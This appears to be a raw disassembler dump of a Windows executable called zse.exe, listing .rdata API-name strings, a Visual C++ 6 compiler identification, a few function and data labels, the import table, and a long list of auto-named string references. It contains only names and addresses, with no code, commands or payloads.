.rdata:0041605C 00000024 C StgOpenAsyncDocfileOnIFillLockBytes
.rdata:00416082 00000018 C OleCreateDefaultHandler
.rdata:0041609C 00000018 C OleCreateMenuDescriptor
.rdata:004160B4 0000000A C ole32.dll
.rdata:004160C0 00000012 C PathRemoveBlanksW
.rdata:004160D4 0000000C C UrlCompareA
.rdata:004160E2 00000010 C PathFindOnPathA
.rdata:004160F4 0000000F C SHAutoComplete
.rdata:00416106 00000010 C UrlGetLocationW
.rdata:00416118 00000010 C PathIsRelativeW
.rdata:0041612A 00000013 C SHRegWriteUSValueW
.rdata:00416140 00000013 C PathIsContentTypeW
.rdata:00416614 0000000D C SHEnumKeyExW
.rdata:00416624 00000011 C PathCompactPathA
.rdata:00416638 0000000E C PathSkipRootA
.rdata:00416648 00000018 C PathUnmakeSystemFolderW
.rdata:00416662 0000000C C StrToIntExW
.rdata:00416670 00000011 C PathQuoteSpacesA
.rdata:00416684 00000016 C PathSearchAndQualifyA
.rdata:0041669C 00000010 C SHQueryValueExW
.rdata:004166AE 00000010 C PathRemoveArgsW
.rdata:004166C0 00000017 C PathFindNextComponentW
.rdata:004166DA 0000000B C PathIsUNCA
.rdata:004166E8 00000013 C PathIsContentTypeA
.rdata:004166FE 0000000D C StrRetToBufW
.rdata:0041670E 00000012 C PathFindFileNameW
.rdata:00416722 00000014 C SHRegDeleteUSValueA
.rdata:00416738 0000000F C SHDeleteValueW
.rdata:0041674A 0000000A C StrCSpnIA
.rdata:00416756 00000012 C PathCommonPrefixW
.rdata:0041676A 0000000E C PathIsPrefixW
.rdata:0041677A 00000010 C UrlIsNoHistoryW
.rdata:0041678C 0000000B C SHCopyKeyW
.rdata:00416592 00000012 C PathFindFileNameA
.rdata:004165A6 00000015 C SHIsLowMemoryMachine
.rdata:004165BE 0000000D C UrlUnescapeA
.rdata:004165CE 00000013 C SHRegDuplicateHKey
.rdata:004165E4 0000000D C SHDeleteKeyW
.rdata:004165F4 00000009 C StrStrIW
.rdata:00416600 00000011 C UrlCanonicalizeW
.rdata:00416B4E 0000000A C CopyFileA
.rdata:00416B5A 00000009 C lstrcpyn
.rdata:00416B66 0000000D C ReadConsoleW
.rdata:00416B76 0000000E C PeekNamedPipe
.rdata:00416B86 00000011 C CreateNamedPipeW
.rdata:00416B9A 00000013 C CreateDirectoryExA
.rdata:00416BB0 00000010 C SetThreadLocale
.rdata:00416BC2 0000000F C ClearCommBreak
.rdata:00416BD4 0000000D C SetStdHandle
.rdata:00416BE4 0000001F C GetNumberOfConsoleMouseButtons
.rdata:00416C06 00000015 C GetFileAttributesExW
.rdata:00416C1E 00000014 C WriteConsoleOutputW
.rdata:00416C34 00000010 C FlushViewOfFile
.rdata:00416C46 0000000B C PulseEvent
.rdata:00416C54 0000000D C GetLocalTime
.rdata:00416C64 00000015 C GetWindowsDirectoryA
.rdata:00416C7C 0000000E C SetCommConfig
.rdata:00416C8C 00000013 C GetFileAttributesW
.rdata:00416CA2 00000011 C GetConsoleTitleA
.rdata:00416CB6 00000017 C SetProcessAffinityMask
.rdata:00416CD0 0000000E C GetSystemInfo
.rdata:00416CE0 00000016 C FlushInstructionCache
.rdata:00416CF8 0000000F C SwitchToThread
.rdata:00416D0A 00000014 C GetCurrentProcessId
.rdata:00416D20 00000016 C DosDateTimeToFileTime
.rdata:00416D38 00000013 C EscapeCommFunction
.rdata:00416D4E 0000000C C HeapDestroy
.rdata:00416D5C 00000015 C SetCurrentDirectoryA
.rdata:00416D74 0000001B C GetConsoleScreenBufferInfo
.rdata:00416D92 0000000F C FindFirstFileA
.rdata:00416DA4 00000011 C CreateNamedPipeA
.rdata:00416DB8 00000010 C GetThreadLocale
.rdata:00416DCA 00000011 C GetTempFileNameA
.rdata:00416DDE 0000000D C GlobalUnWire
.rdata:00416DEE 0000000E C SwitchToFiber
.rdata:00416DFE 00000018 C LocalFileTimeToFileTime
.rdata:00416E18 00000014 C CreateTapePartition
.rdata:00416E2E 0000000F C GlobalAddAtomW
.rdata:00416E40 00000014 C WaitForSingleObject
.rdata:00416E56 0000000D C CreateMutexA
.rdata:00416E66 00000012 C GetShortPathNameW
.rdata:00416E7A 0000000C C FoldStringW
.rdata:00416E88 0000000F C CompareStringA
.rdata:00416E9A 00000009 C ReadFile
.rdata:00416EA6 00000019 C FreeLibraryAndExitThread
.rdata:00416EC2 00000010 C CompareFileTime
.rdata:00416ED4 00000019 C GetNamedPipeHandleStateA
.rdata:00416EF0 00000015 C GetUserDefaultLangID
.rdata:00416F08 00000016 C SetDefaultCommConfigA
.rdata:00416F20 00000011 C GetModuleHandleA
.rdata:00416F34 0000000E C GetSystemTime
.rdata:00416F44 00000016 C GetVolumeInformationW
.rdata:00416F5C 00000011 C GetLongPathNameA
.rdata:00416F70 0000000E C Process32Next
.rdata:00416F80 00000012 C SetFileApisToANSI
.rdata:00416F94 00000011 C FlushFileBuffers
.rdata:00416FA8 00000014 C GetSystemDirectoryW
.rdata:00416FBE 00000013 C GetCommModemStatus
.rdata:00416FD4 0000000B C GlobalSize
.rdata:00416FE2 00000013 C SetFileAttributesA
.rdata:00416FF8 00000012 C SetThreadPriority
.rdata:0041700C 00000009 C CancelIo
.rdata:00417018 00000012 C EnumCalendarInfoA
.rdata:0041679A 0000000D C SHDeleteKeyA
.rdata:004167AA 00000011 C SHRegSetUSValueW
.rdata:004167BE 00000014 C PathRelativePathToA
.rdata:004167D4 00000010 C PathMakePrettyW
.rdata:004167E6 0000000C C PathAppendA
.rdata:004167F4 00000010 C UrlIsNoHistoryA
.rdata:00416804 0000000C C SHLWAPI.dll
.rdata:00416812 00000014 C EnumCalendarInfoExA
.rdata:00416828 0000000D C Module32Next
.rdata:00416838 00000013 C EnumSystemLocalesW
.rdata:0041684E 0000000F C Heap32ListNext
.rdata:00416860 00000013 C GetUserDefaultLCID
.rdata:00416876 00000011 C EnumTimeFormatsA
.rdata:0041688A 0000000A C lstrcmpiA
.rdata:00416896 0000001A C GetQueuedCompletionStatus
.rdata:004168B2 0000000C C FreeLibrary
.rdata:004168C0 00000013 C EnumSystemLocalesA
.rdata:004168D6 0000000E C Thread32First
.rdata:004168E6 00000011 C GetNamedPipeInfo
.rdata:004168FA 0000000D C GlobalUnlock
.rdata:0041690A 00000018 C FreeEnvironmentStringsA
.rdata:00416924 0000000B C GlobalFree
.rdata:00416932 00000011 C GetCurrentThread
.rdata:00416946 00000012 C PeekConsoleInputA
.rdata:0041695A 00000010 C FindResourceExA
.rdata:0041696C 0000000F C VirtualProtect
.rdata:0041697E 0000000C C OpenProcess
.rdata:0041698C 00000017 C GetSystemDefaultLangID
.rdata:004169A6 00000017 C GetEnvironmentStringsA
.rdata:004169C0 0000000D C VirtualAlloc
.rdata:004169D0 00000009 C HeapLock
.rdata:004169DC 00000015 C ConvertDefaultLocale
.rdata:004169F4 00000010 C SetVolumeLabelW
.rdata:00416A06 0000000F C SizeofResource
.rdata:00416A18 00000011 C SetFileApisToOEM
.rdata:00416A2C 00000018 C FileTimeToLocalFileTime
.rdata:00416A46 00000011 C GetFullPathNameW
.rdata:00416A5A 00000012 C GetDiskFreeSpaceW
.rdata:00416A6E 0000000E C SetSystemTime
.rdata:00416A7E 00000013 C EnumDateFormatsExW
.rdata:00416A94 0000000F C CallNamedPipeA
.rdata:00416AA6 0000001C C FindCloseChangeNotification
.rdata:0041702C 00000008 C TlsFree
.rdata:00417036 00000018 C QueryPerformanceCounter
.rdata:00417050 00000015 C GetCurrentDirectoryW
.rdata:00417068 00000010 C WriteFileGather
.rdata:0041707A 00000011 C DefineDosDeviceW
.rdata:0041708E 00000016 C SetDefaultCommConfigW
.rdata:004170A6 00000014 C GetDevicePowerState
.rdata:004170BC 00000011 C SetPriorityClass
.rdata:004170D0 00000019 C GetPrivateProfileStringA
.rdata:004170EC 0000001E C GetNumberOfConsoleInputEvents
.rdata:0041710C 00000016 C ReadDirectoryChangesW
.rdata:00417124 00000013 C EndUpdateResourceA
.rdata:0041713A 00000011 C IsDBCSLeadByteEx
.rdata:0041714E 0000000B C OpenMutexA
.rdata:0041715C 00000017 C SetTimeZoneInformation
.rdata:00417176 00000008 C lstrlen
.rdata:00417180 0000000D C CreateThread
.rdata:00417190 00000013 C CreateRemoteThread
.rdata:004171A6 0000000F C CompareStringW
.rdata:004171B8 0000001D C SetProcessShutdownParameters
.rdata:004171D8 0000001C C Toolhelp32ReadProcessMemory
.rdata:004171F6 00000019 C GetPrivateProfileStructW
.rdata:00417212 00000010 C GetProcessHeaps
.rdata:00417224 0000000F C GetDateFormatW
.rdata:00417236 00000012 C SetTapeParameters
.rdata:0041724A 0000001D C SetConsoleActiveScreenBuffer
.rdata:0041726A 0000000B C OpenMutexW
.rdata:00417278 00000018 C IsSystemResumeAutomatic
.rdata:00417292 00000010 C SetTapePosition
.rdata:004172A4 0000000A C EraseTape
.rdata:004172B0 0000001B C PostQueuedCompletionStatus
.rdata:004172CE 0000000A C LocalFree
.rdata:004172DA 00000012 C GetThreadPriority
.rdata:004172EE 0000001C C FillConsoleOutputCharacterW
.rdata:0041730C 00000008 C lstrcmp
.rdata:00417316 00000016 C WaitForSingleObjectEx
.rdata:0041732E 00000011 C GetComputerNameW
.rdata:00417342 0000000F C GetThreadTimes
.rdata:00417354 00000012 C EnumCalendarInfoW
.rdata:00417368 0000000C C BackupWrite
.rdata:00417376 0000000E C SuspendThread
.rdata:00417384 0000000D C KERNEL32.dll
zse.exe: the compiler used to build the program is identified as vc6win (Visual C++ v6).
F (dark blue) - regular function:
DialogFunc 004241D2
start 00424306 P
StartAddress 00424509
D (light green) - data:
hWnd 00429030
lpMem 00429034
hInstance 00429040
szDir 00429050
hHeap 0042A020
I (purple) - imported name:
00401000 CryptHashData ADVAPI32
00401004 CryptDestroyHash ADVAPI32
00401008 CryptCreateHash ADVAPI32
0040100C CryptGetHashParam ADVAPI32
00401010 CryptReleaseContext ADVAPI32
00401014 CryptAcquireContextW ADVAPI32
0040101C GetSaveFileNameW COMDLG32
00401020 GetOpenFileNameW COMDLG32
00401028 WriteFile KERNEL32
0040102C ReadFile KERNEL32
00401030 CreateFileW KERNEL32
00401034 OpenMutexW KERNEL32
00401038 SetNamedPipeHandleState KERNEL32
0040103C HeapReAlloc KERNEL32
00401040 MapViewOfFile KERNEL32
00401044 UnmapViewOfFile KERNEL32
00401048 FreeLibrary KERNEL32
0040104C HeapAlloc KERNEL32
00401050 HeapFree KERNEL32
00401054 GetTickCount KERNEL32
00401058 GetProcessHeap KERNEL32
0040105C WaitNamedPipeW KERNEL32
00401060 HeapDestroy KERNEL32
00401064 HeapCreate KERNEL32
00401068 MultiByteToWideChar KERNEL32
0040106C GetFileSizeEx KERNEL32
00401070 CreateFileMappingW KERNEL32
00401074 SetFileAttributesW KERNEL32
00401078 CreateThread KERNEL32
0040107C CloseHandle KERNEL32
00401080 Sleep KERNEL32
00401084 GetModuleHandleA KERNEL32
00401088 LoadLibraryA KERNEL32
0040108C GetProcAddress KERNEL32
00401090 GetModuleFileNameW KERNEL32
00401094 ExitProcess KERNEL32
00401098 lstrcmpiA KERNEL32
0040109C lstrcpyW KERNEL32
004010A0 WideCharToMultiByte KERNEL32
004010A4 DeleteFileW KERNEL32
004010AC ShellExecuteW SHELL32
004010B4 wvnsprintfW SHLWAPI
004010B8 wnsprintfW SHLWAPI
004010BC PathRemoveFileSpecW SHLWAPI
004010C0 PathFileExistsW SHLWAPI
004010C4 StrCmpNIA SHLWAPI
004010C8 PathFindFileNameA SHLWAPI
004010CC PathCombineW SHLWAPI
004010D4 GetWindowTextLengthW USER32
004010D8 MessageBoxW USER32
004010DC SetWindowTextW USER32
004010E0 DestroyWindow USER32
004010E4 LoadImageW USER32
004010E8 DialogBoxParamW USER32
004010EC EndDialog USER32
004010F0 ShowWindow USER32
004010F4 CreateDialogParamW USER32
004010F8 GetDlgItem USER32
004010FC SetWindowLongW USER32
00401100 GetDlgItemTextW USER32
00401104 EnableWindow USER32
00401108 SendMessageW USER32
0040110C SetDlgItemTextW USER32
00401114 OleInitialize ole32
A (dark green) - ascii string:
aIsbadcodeptr 00420B5C aInitializecr_0 00420B6C
aInitatomtable 00420B94
aHeapwalk 00420BA4 aHeapvalidate 00420BB0
aHeapunlock 00420BC0
aHeaplock 00420BCC aHeapfree_0 00420BD8
aHeapdestroy_0 00420BE4
aHeapcreate_0 00420BF0 aHeapcompact 00420BFC
aEap32next 00420C09
aHeap32listnext 00420C14
aHeap32listfirs 00420C24
aHeap32first 00420C34
aGlobalwire 00420C40 aGlobalunlock_0 00420C4C
aGlobalunfix 00420C5C
aGlobalunwire 00420C68 aLobalsize 00420C79
aGlobalrealloc 00420C84
aGlobalmemoryst 00420C94 aGloballock_0 00420CA8
aGlobalhandle 00420CB4
aGlobalgetatomn 00420CC4 aGlobalgetato_0 00420CD8
aLobalfree 00420CED
aGlobalflags 00420CF8 aGlobalfix 00420D04
aGlobalfindatom 00420D10
aGlobalfindat_0 00420D20 aGlobaldeleteat 00420D30
aGlobalcompact 00420D44
aGlobalalloc 00420D54 aLobaladdatomw 00420D61
aGlobaladdatoma 00420D70
aGetwritewatch 00420D80 aGetwindowsdire 00420D90
aGetwindowsdi_0 00420DA8
aGetvolumeinfor 00420DC0 aGetvolumeinf_0 00420DD8
aGetversionex_0 00420DF0
aGetversionexa 00420E00 aGetversion 00420E10
aGetuserdefau_1 00420E1C aGetuserdefault 00420E34
aGettimezonei_0 00420E48
aGettimeformatw 00420E60 aGettimeformata 00420E70
aGettickcount_0 00420E80
aGetthreadtimes 00420E90
aGetthreadselec 00420EA0
aGetthreadpri_0 00420EB8
aGetthreadpri_1 00420ED0 aGetthreadlocal 00420EE4
aGetthreadcon_0 00420EF4
aGettemppathw_0 00420F08 aGettemppatha 00420F18
aGettempfilen_0 00420F28
aGettempfilen_1 00420F3C aGettapestatus 00420F50
aGettapepositio 00420F60
aGettapeparamet 00420F70
aStgopenstorage 0041977C
aStgopenstora_0 00419798 aStgopenstora_1 004197AC
aStgopenasyncdo 004197BC
aStgisstorageil 004197E0 aStgisstoragefi 004197F8
aStggetifillloc 0041980C
aStggetifilll_0 00419830 aStgcreatestora 0041984C
aStgcreatedocfi 00419860
aStgcreatedoc_0 00419880 aSetdocumentbit 00419894
aSetconvertstg 004198A8
aRevokedragdrop 004198B8 aReleasestgmedi 004198C8
aRegisterdragdr 004198DC
aReadstringstre 004198F0 aReadolestg 00419904
aReadfmtusertyp 00419910
aReadclassstm 00419924
aReadclassstg 00419934
aPropvariantcop 00419944
aPropvariantcle 00419954 aProgidfromclsi 00419968
aOpenorcreatest 00419978
aOleuninitializ 0041998C aOletranslateac 0041999C
aOlesetmenudesc 004199B4
aOlesetcontaine 004199CC aOlesetclipboar 004199E4
aOlesetautoconv 004199F4
aOlesavetostrea 00419A08 aOlesave 00419A18
aOlerun 00419A20
aOlereggetusert 00419A28 aOlereggetmiscs 00419A3C
aOleregenumverb 00419A50
aOleregenumform 00419A60 aOlequerylinkfr 00419A74
aOlequerycreate 00419A8C
aOlenoteobjectv 00419AA4 aOlemetafilepic 00419ABC
aOlelockrunning 00419ADC
aOleloadfromstr 00419AEC aOleload 00419B00
aOleisrunning 00419B08
aOleiscurrentcl 00419B18 aOleinitialize 00419B30
aOlegeticonoffi 00419B40
aOlegeticonofcl 00419B54 aOlegetclipboar 00419B68
aOlegetautoconv 00419B78 aOleflushclipbo 00419B8C
aOleduplicateda 00419BA0
aOledraw 00419BB4 aOledoautoconve 00419BBC
aOledestroymenu 00419BD0
aOlecreatestati 00419BEC
aOlecreatemenud 00419C04
aOlecreatelinkt 00419C1C
aOlecreatelin_0 00419C34 aOlecreatelinkf 00419C48
aOlecreatelin_1 00419C60
aOlecreatelinke 00419C78 aOlecreatelink 00419C88
aOlecreatefromf 00419C98
aOlecreatefro_0 00419CAC aOlecreatefromd 00419CC0
aOlecreatefro_1 00419CD4
aOlecreateex 00419CE8
aRegopenkeyw 0041D2D8
aRegopenkeyex_0 0041D2E4 aRegopenkeyexa 0041D2F4
aRegopenkeya 0041D304
aRegnotifychang 0041D310 aRegloadkeyw 0041D328
aRegloadkeya 0041D334
aReggetkeysecur 0041D340 aRegflushkey 0041D354
aRegenumvaluew 0041D360
aRegenumvaluea 0041D370 aRegenumkeyw 0041D380
aRegenumkeyex_0 0041D38C
aRegenumkeyexa 0041D39C aRegenumkeya 0041D3AC
aRegdeleteval_0 0041D3B8
aRegdeleteval_1 0041D3C8 aRegdeletekeyw 0041D3D8
aRegdeletekeya 0041D3E8
aRegcreatekeyw 0041D3F8
aRegcreatekey_1 0041D408
aRegcreatekey_2 0041D418
aRegcreatekeya 0041D428 aRegconnectregi 0041D438
aRegconnectre_0 0041D44C
aRegclosekey_0 0041D460 aReadeventlogw 0041D46C
aReadeventloga 0041D47C
aQueryservicest 0041D48C aQueryserviceob 0041D4A0
aQueryservicelo 0041D4BC
aQueryservice_0 0041D4D4 aQueryserviceco 0041D4EC
aQueryservice_1 0041D500
aPrivilegedserv 0041D514 aPrivilegedse_0 0041D534
aPrivilegecheck 0041D554
aOpenthreadtoke 0041D564 aOpenservicew 0041D574
aOpenservicea 0041D584
aOpenscmanagerw 0041D594 aOpenscmanagera 0041D5A4
aOpenprocesst_0 0041D5B4
aOpeneventlogw 0041D5C8 aOpeneventloga 0041D5D8
aOpenbackupeven 0041D5E8
aOpenbackupev_0 0041D5FC aObjectprivileg 0041D610
aObjectprivil_0 0041D62C
aObjectopenaudi 0041D648 aObjectopenau_0 0041D660
aObjectdeleteau 0041D678 aObjectdelete_0 0041D690
aObjectcloseaud 0041D6A8
aObjectclosea_0 0041D6C0 aNotifychangeev 0041D6D8
aNotifybootconf 0041D6F0
aMapgenericmask 0041D708
aMakeselfrelati 0041D718
aMakeabsolutesd 0041D72C
aLookupsecurity 0041D73C aLookupsecuri_0 0041D75C
aLookupprivil_0 0041D77C
aLookupprivil_1 0041D794 aLookupprivil_2 0041D7AC
aLookupprivil_3 0041D7C4
aLookupprivil_4 0041D7DC aLookupprivil_5 0041D7F8
aLookupaccoun_0 0041D814
aLookupaccoun_1 0041D828
aGetsystemtimea 00420F84
aGetsystemtim_0 00420F9C aGetsystemtim_1 00420FB4
aGetsystempower 00420FC4
aGetsysteminfo 00420FDC aGetsystemdirec 00420FEC
aGetsystemdir_0 00421000
aGetsystemdefau 00421014 aGetsystemdef_0 0042102C
aGetstringtypew 00421044
aGetstringtypee 00421054 aGetstringtyp_0 00421068
aGetstringtypea 0042107C
aGetstdhandle 0042108C aGetstartupinfo 0042109C
aGetstartupin_0 004210AC
aGetshortpathna 004210BC aGetshortpath_0 004210D0
aGetqueuedcompl 004210E4
aGetprofilestri 00421100
aGetprofilest_0 00421114
aGetprofilesect 00421128
aGetprofilese_0 0042113C aGetprofileintw 00421150
aGetprofileinta 00421160
aGetprocesswork 00421170 aGetprocessvers 0042118C
aGetprocessti_0 004211A0
aGetprocessshut 004211B0 aGetprocessprio 004211D0
aGetprocesshe_0 004211E8
aGetprocesshe_1 004211F8 aGetprocessaffi 00421208
aGetprocaddre_0 00421220
aGetprivatepr_0 00421230 aGetprivatepr_1 0042124C
aGetprivatepr_2 00421268
aGetprivatepr_3 00421284 aGetprivatepr_4 004212A0
aGetprivatepr_5 004212BC
aGetprivatepr_6 004212DC aGetprivatepr_7 004212FC
aGetprivateprof 00421318
aGetprivatepr_8 00421330 aGetprioritycla 00421348
aGetoverlappe_0 0042135C
aGetoemcp 00421370 aGetnumberofcon 0042137C
aGetnumberofc_0 0042139C
aGetnumberforma 004213BC aGetnumberfor_0 004213D0
aGetnamedpipein 004213E4 aGetnamedpipeha 004213F8
aGetnamedpipe_0 00421414
aGetmodulehan_0 00421430 aGetmodulehan_1 00421444
aGetmodulefil_2 00421458
aGetmodulefil_3 0042146C
aGetmailslotinf 00421480
aGetlongpathnam 00421490
aGetlongpathn_0 004214A4 aGetlogicaldr_0 004214B8
aGetlogicaldr_1 004214CC
aGetlogicaldr_2 004214E4 aGetlocaleinfow 004214FC
aGetlocaleinfoa 0042150C
aGetlocaltime_0 0042151C aGetlasterror_0 0042152C
aGetlargestcons 0042153C
aGethandleinfor 00421558
aOlecreateembed 00419CF4
aOlecreatedefau 00419D10 aOlecreate 00419D28
aOleconvertoles 00419D34
aOleconvertol_0 00419D54 aOleconvertisto 00419D74
aOleconvertis_0 00419D94
aOlebuildversio 00419DB4 aMonikerrelativ 00419DC4
aMonikercommonp 00419DDC
aMkparsedisplay 00419DF4 aIsequalguid 00419E08
aIsaccelerator 00419E14
aIidfromstring 00419E24 aGetrunningobje 00419E34
aGethookinterfa 00419E4C
aGethglobalfrom 00419E60 aGethglobalfr_0 00419E78
aGetdocumentbit 00419E94
aGetconvertstg 00419EA8
aGetclassfile 00419EB8
aFreepropvarian 00419EC8
aEnablehookobje 00419EE0 aDodragdrop 00419EF4
aDlldebugobject 00419F00
aCreatestreamon 00419F18 aCreatepointerm 00419F30
aCreateoleadvis 00419F48
aCreateobjrefmo 00419F60 aCreateitemmoni 00419F74
aCreateilockbyt 00419F88
aCreategenericc 00419FA4 aCreatefilemoni 00419FBC
aCreatedatacach 00419FD0
aCreatedataadvi 00419FE0 aCreateclassmon 00419FF8
aCreatebindctx 0041A00C
aCreateantimoni 0041A01C aCounmarshalint 0041A030
aCounmarshalhre 0041A048
aCouninitialize 0041A05C aCotreatasclass 0041A06C
aCotaskmemreall 0041A07C
aCotaskmemfree 0041A090 aCotaskmemalloc 0041A0A0
aCoswitchcallco 0041A0B0
aCosuspendclass 0041A0C4 aCosetproxyblan 0041A0DC
aCorevokemalloc 0041A0F0
aCorevokeclasso 0041A104 aCoreverttoself 0041A118
aCoresumeclasso 0041A128 aCoreleaseserve 0041A140
aCoreleasemarsh 0041A158
aCoregistersurr 0041A170 aCoregisterpscl 0041A184
aCoregistermess 0041A198
aCoregistermall 0041A1B0
aCoregisterclas 0041A1C4
aCoregisterchan 0041A1DC
aCoqueryrelease 0041A1F4 aCoqueryproxybl 0041A20C
aCoqueryclientb 0041A220
aCoqueryauthent 0041A238 aComarshalinter 0041A258
aComarshalint_0 0041A26C
aComarshalhresu 0041A294 aColockobjectex 0041A2A8
aColoadlibrary 0041A2C0
aCoisole1class 0041A2D0
aLookupaccountn 0041D83C
aLookupaccoun_2 0041D850 aLogonuserw 0041D864
aLogonusera 0041D870
aLockservicedat 0041D87C aIsvalidsid 0041D890
aIsvalidsecurit 0041D89C
aIsvalidacl 0041D8B8 aIstextunicode 0041D8C4
aInitiatesystem 0041D8D4
aInitiatesyst_0 0041D8EC aInitializesid 0041D904
aInitializese_0 0041D914
aInitializeacl 0041D934 aImpersonatesel 0041D944
aImpersonatenam 0041D954
aImpersonatelog 0041D970 aGetusernamew_0 0041D988
aGetusernamea 0041D998
aGettrusteetype 0041D9A8
aGettrusteety_0 0041D9B8
aGettrusteename 0041D9C8
aGettrusteena_0 0041D9D8 aGettokeninfo_0 0041D9E8
aGetsidsubautho 0041D9FC
aGetsidsubaut_0 0041DA14 aGetsidlengthre 0041DA28
aGetsididentifi 0041DA40
aGetservicekeyn 0041DA5C aGetserviceke_0 0041DA70
aGetservicedisp 0041DA84
aGetservicedi_0 0041DA9C aGetsecurityinf 0041DAB4
aGetsecurityi_0 0041DAC8
aGetsecurityi_1 0041DADC aGetsecuritydes 0041DAEC
aGetsecurityd_0 0041DB08
aGetsecurityd_1 0041DB24 aGetsecurityd_2 0041DB40
aGetsecurityd_3 0041DB5C
aGetsecurityd_4 0041DB78 aGetprivateobje 0041DB98
aGetoverlappeda 0041DBB4
aGetoldestevent 0041DBD0 aGetnumberofeve 0041DBE8
aGetnamedsecuri 0041DC04
aGetnamedsecu_0 0041DC1C aGetnamedsecu_1 0041DC34
aGetnamedsecu_2 0041DC4C
aGetmultipletru 0041DC64 aGetmultiplet_0 0041DC78
aGetmultiplet_1 0041DC98 aGetmultiplet_2 0041DCB8
aGetlengthsid 0041DCCC
aGetkernelobjec 0041DCDC aGetfilesecurit 0041DCF4
aGetfilesecur_0 0041DD08
aGetexplicitent 0041DD1C
aGetexplicite_0 0041DD38
aGeteffectiveri 0041DD54
aGeteffective_0 0041DD70 aGetcurrenthwpr 0041DD8C
aGetcurrenthw_0 0041DDA4
aGetauditedperm 0041DDBC aGetauditedpe_0 0041DDDC
aGetaclinformat 0041DDFC
aGetace 0041DE10 aGetaccesspermi 0041DE18
aGetaccessper_0 0041DE38
aFreesid 0041DE58
aGetfullpathnam 00421570
aGetfullpathn_0 00421584 aGetfiletype 00421598
aGetfiletime_0 004215A4
aGetfilesize_0 004215B0 aGetfileinfor_0 004215BC
aGetfileattri_0 004215D8
aGetfileattri_1 004215EC aGetfileattri_2 00421604
aGetfileattri_3 0042161C
aGetexitcodethr 00421630 aGetexitcodep_0 00421644
aGetenvironme_1 00421658
aGetenvironme_2 00421670 aGetenvironment 00421688
aGetenvironme_3 004216A0
aGetenvironme_4 004216B8 aGetdrivetype_0 004216D0
aGetdrivetypea 004216E0
aGetdiskfreespa 004216F0
aGetdiskfrees_0 00421704
aGetdiskfrees_1 00421718
aGetdiskfrees_2 0042172C aGetdevicepower 00421740
aGetdefaultcomm 00421754
aGetdefaultco_0 0042176C aGetdateformatw 00421784
aGetdateformata 00421794
aGetcurrentth_1 004217A4 aGetcurrentth_2 004217B8
aGetcurrentpr_0 004217CC
aGetcurrentpr_1 004217E0 aGetcurrentdire 004217F4
aGetcurrentdi_0 0042180C
aGetcurrencyfor 00421824 aGetcurrencyf_0 00421838
aGetconsoletitl 0042184C
aGetconsoleti_0 00421860 aGetconsolescre 00421874
aGetconsoleoutp 00421890
aGetconsolemode 004218A4 aGetconsolecurs 004218B4
aGetconsolecp 004218CC
aGetcomputern_0 004218DC aGetcomputern_1 004218F0
aGetcompressedf 00421904
aGetcompresse_0 0042191C aGetcommandli_0 00421934
aGetcommandli_1 00421944
aGetcommtimeout 00421954 aGetcommstate 00421964
aGetcommpropert 00421974 aGetcommmodemst 00421988
aGetcommmask 0042199C
aGetcommconfig 004219A8 aGetcalendarinf 004219B8
aGetcalendari_0 004219CC
aGetcpinfoexw 004219E0
aGetcpinfoexa 004219F0
aGetcpinfo 00421A00
aGetbinarytypew 00421A0C aGetbinarytypea 00421A1C
aGetbinarytype 00421A2C
aGetatomnamew 00421A3C aGetatomnamea 00421A4C
aGetacp 00421A5C
aGenerateconsol 00421A64 aFreeresource 00421A80
aFreelibraryand 00421A90
aFreelibrary_0 00421AAC
aCoishandlercon 0041A2E0
aCoinitializese 0041A2F8 aCoinitializeex 0041A310
aCoinitialize 0041A320
aCoimpersonatec 0041A330 aCogettreatascl 0041A344
aCogetstandardm 0041A358
aCogetpsclsid 0041A370 aCogetobject 0041A380
aCogetmarshalsi 0041A38C
aCogetmalloc 0041A3A0 aCogetinterface 0041A3AC
aCogetinstancef 0041A3CC
aCogetinstanc_0 0041A3E8 aCogetcurrentpr 0041A400
aCogetcurrentlo 0041A414
aCogetclassobje 0041A430 aCogetcallertid 0041A444
aCogetcallconte 0041A454
aCofreeunusedli 0041A468
aCofreelibrary 0041A480
aCofreealllibra 0041A490
aCofiletimetodo 0041A4A4 aCofiletimenow 0041A4BC
aCodosdatetimet 0041A4CC
aCodisconnectob 0041A4E4 aCocreateinst_0 0041A4F8
aCocreateinst_1 0041A50C
aCocreateguid 0041A520 aCocreatefreeth 0041A530
aCocopyproxy 0041A550
aCobuildversion 0041A55C aCoaddrefserver 0041A56C
aClsidfromstr_0 0041A584
aClsidfromprogi 0041A594 aBindmoniker 0041A5A4
aWindowfrompoin 0041A5B0
aWindowfromdc 0041A5C0 aWinhelpw 0041A5D0
aWinhelpa 0041A5DC
aWaitmessage 0041A5E8 aWaitforinputid 0041A5F4
aWinnlsgetimeho 0041A608
aWinnlsgetenabl 0041A61C aWinnlsenableim 0041A634
aVkkeyscanw 0041A644
aVkkeyscanexw 0041A650 aVkkeyscanexa 0041A660
aVkkeyscana 0041A670
aValidatergn 0041A67C aValidaterect 0041A688
aUpdatewindow 0041A698 aUnregisterhotk 0041A6A8
aUnregisterdevi 0041A6BC
aUnregisterclas 0041A6DC aUnregistercl_0 0041A6F0
aUnpackddelpara 0041A704
aUnloadkeyboard 0041A714
aUnionrect 0041A72C
aUnhookwindowsh 0041A738
aUnhookwindow_0 0041A74C aUnhookwinevent 0041A760
aTranslatemes_0 0041A770
aTranslatemdisy 0041A784 aTranslateaccel 0041A79C
aTranslateacc_0 0041A7B4
aTranslateacc_1 0041A7CC aTrackpopupmenu 0041A7E4
aTrackpopupme_0 0041A7F8
aTrackmouseeven 0041A808
aFindfirstfreea 0041DE60
aEqualsid 0041DE74 aEqualprefixsid 0041DE80
aEnumservicesst 0041DE90
aEnumservices_0 0041DEA4 aEnumdependents 0041DEB8
aEnumdependen_0 0041DED0
aDuplicatetok_0 0041DEE8 aDuplicatetok_1 0041DEFC
aDestroyprivate 0041DF0C
aDeregistereven 0041DF2C aDeleteservice 0041DF44
aDeleteace 0041DF54
aCryptverifysig 0041DF60 aCryptverifys_0 0041DF78
aCryptsignhashw 0041DF90
aCryptsignhasha 0041DFA0 aCryptsetprovid 0041DFB0
aCryptsetprov_0 0041DFC4
aCryptsetprov_1 0041DFD8
aCryptsetprov_2 0041DFEC
aCryptsetprovpa 0041E000
aCryptsetkeypar 0041E014 aCryptsethashpa 0041E028
aCryptrelease_0 0041E03C
aCryptimportkey 0041E050 aCrypthashsessi 0041E060
aCrypthashdat_0 0041E074
aCryptgetuserke 0041E084 aCryptgetprovpa 0041E094
aCryptgetkeypar 0041E0A8
aCryptgethash_0 0041E0BC aCryptgetdefaul 0041E0D0
aCryptgetdefa_0 0041E0EC
aCryptgenrandom 0041E108 aCryptgenkey 0041E118
